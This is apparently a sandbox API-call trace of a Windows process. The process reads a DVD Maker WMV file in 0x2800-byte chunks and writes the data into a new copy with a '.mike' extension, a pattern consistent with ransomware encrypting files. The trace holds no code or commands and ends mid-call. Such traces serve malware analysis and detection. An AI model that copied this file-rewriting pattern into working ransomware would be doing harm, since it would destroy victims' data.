[0064.744] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.744] GetFileType (hFile=0x288) returned 0x1 [0064.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.744] GetFileType (hFile=0x288) returned 0x1 [0064.744] SetFilePointer (in: hFile=0x288, lDistanceToMove=3184640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x309800 [0064.744] ReadFile (in: hFile=0x288, lpBuffer=0x229eec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x229eec0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.745] CloseHandle (hObject=0x288) returned 1 [0064.745] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.745] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.746] GetFileType (hFile=0x288) returned 0x1 [0064.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.746] GetFileType (hFile=0x288) returned 0x1 [0064.746] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x309a20 [0064.746] WriteFile (in: hFile=0x288, lpBuffer=0x22a9428*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22a9428*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.746] CloseHandle (hObject=0x288) returned 1 [0064.746] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.746] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.746] GetFileType (hFile=0x288) returned 0x1 [0064.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.746] GetFileType (hFile=0x288) returned 0x1 [0064.747] SetFilePointer (in: hFile=0x288, lDistanceToMove=3194880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x30c000 [0064.747] ReadFile (in: hFile=0x288, lpBuffer=0x22abef0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22abef0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.747] CloseHandle (hObject=0x288) returned 1 [0064.748] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.748] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.748] GetFileType (hFile=0x288) returned 0x1 [0064.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.748] GetFileType (hFile=0x288) returned 0x1 [0064.748] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x30c220 [0064.748] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.749] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.749] GetFileType (hFile=0x288) returned 0x1 [0064.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.749] GetFileType (hFile=0x288) returned 0x1 [0064.749] ReadFile (in: hFile=0x288, lpBuffer=0x22b8f20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b8f20*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.750] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.750] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.750] GetFileType (hFile=0x288) returned 0x1 [0064.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.750] GetFileType (hFile=0x288) returned 0x1 [0064.750] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x30ea20 [0064.751] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.751] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.751] GetFileType (hFile=0x288) returned 0x1 [0064.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.751] GetFileType (hFile=0x288) returned 0x1 [0064.751] ReadFile (in: hFile=0x288, lpBuffer=0x22c5f50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22c5f50*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.752] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.752] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.752] GetFileType (hFile=0x288) returned 0x1 [0064.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.752] GetFileType (hFile=0x288) returned 0x1 [0064.752] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x311220 [0064.753] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.753] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.753] GetFileType (hFile=0x288) returned 0x1 [0064.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.753] GetFileType (hFile=0x288) returned 0x1 [0064.753] ReadFile (in: hFile=0x288, lpBuffer=0x22d2f80, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22d2f80*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.754] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.754] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.754] GetFileType (hFile=0x288) returned 0x1 [0064.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.754] GetFileType (hFile=0x288) returned 0x1 [0064.754] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x313a20 [0064.755] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.755] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.755] GetFileType (hFile=0x288) returned 0x1 [0064.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.755] GetFileType (hFile=0x288) returned 0x1 [0064.755] ReadFile (in: hFile=0x288, lpBuffer=0x22dffb0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22dffb0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.757] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.757] GetFileType (hFile=0x288) returned 0x1 [0064.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.757] GetFileType (hFile=0x288) returned 0x1 [0064.757] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x316220 [0064.758] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.758] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.758] GetFileType (hFile=0x288) returned 0x1 [0064.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.758] GetFileType (hFile=0x288) returned 0x1 [0064.758] ReadFile (in: hFile=0x288, lpBuffer=0x20f17a4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20f17a4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.759] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.759] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.759] GetFileType (hFile=0x288) returned 0x1 [0064.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.759] GetFileType (hFile=0x288) returned 0x1 [0064.760] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x318a20 [0064.760] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.760] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.760] GetFileType (hFile=0x288) returned 0x1 [0064.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.760] GetFileType (hFile=0x288) returned 0x1 [0064.760] ReadFile (in: hFile=0x288, lpBuffer=0x20fe7d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20fe7d4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.761] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.761] GetFileType (hFile=0x288) returned 0x1 [0064.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.762] GetFileType (hFile=0x288) returned 0x1 [0064.762] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x31b220 [0064.762] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.762] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.762] GetFileType (hFile=0x288) returned 0x1 [0064.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.762] GetFileType (hFile=0x288) returned 0x1 [0064.762] ReadFile (in: hFile=0x288, lpBuffer=0x210b804, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x210b804*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.763] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.763] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.763] GetFileType (hFile=0x288) returned 0x1 [0064.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.764] GetFileType (hFile=0x288) returned 0x1 [0064.764] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x31da20 [0064.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.764] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.764] GetFileType (hFile=0x288) returned 0x1 [0064.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.765] GetFileType (hFile=0x288) returned 0x1 [0064.765] ReadFile (in: hFile=0x288, lpBuffer=0x2118834, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2118834*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.766] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.766] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.766] GetFileType (hFile=0x288) returned 0x1 [0064.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.766] GetFileType (hFile=0x288) returned 0x1 [0064.766] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x320220 [0064.766] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.766] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.767] GetFileType (hFile=0x288) returned 0x1 [0064.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.767] GetFileType (hFile=0x288) returned 0x1 [0064.767] ReadFile (in: hFile=0x288, lpBuffer=0x2125864, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2125864*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD 